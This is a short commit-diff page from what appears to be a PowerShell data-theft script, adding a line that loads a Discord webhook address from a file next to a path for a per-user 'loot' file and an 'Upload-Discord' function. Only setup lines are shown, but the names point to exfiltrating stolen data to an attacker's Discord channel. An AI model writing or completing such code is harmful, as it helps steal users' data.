Update -logs.ps1
This commit is contained in:
parent
2cd44ba366
commit
66fbf5a5e7
1 changed files with 2 additions and 0 deletions
|
@ -4,6 +4,8 @@
|
|||
|
||||
$Path="$env:appdata\-locker\$env:UserName-loot.txt"
|
||||
|
||||
$dc = [IO.File]::ReadAllText(".\wh.txt")
|
||||
|
||||
function Upload-Discord {
|
||||
|
||||
[CmdletBinding()]
|
||||
|
|
Loading…
Reference in a new issue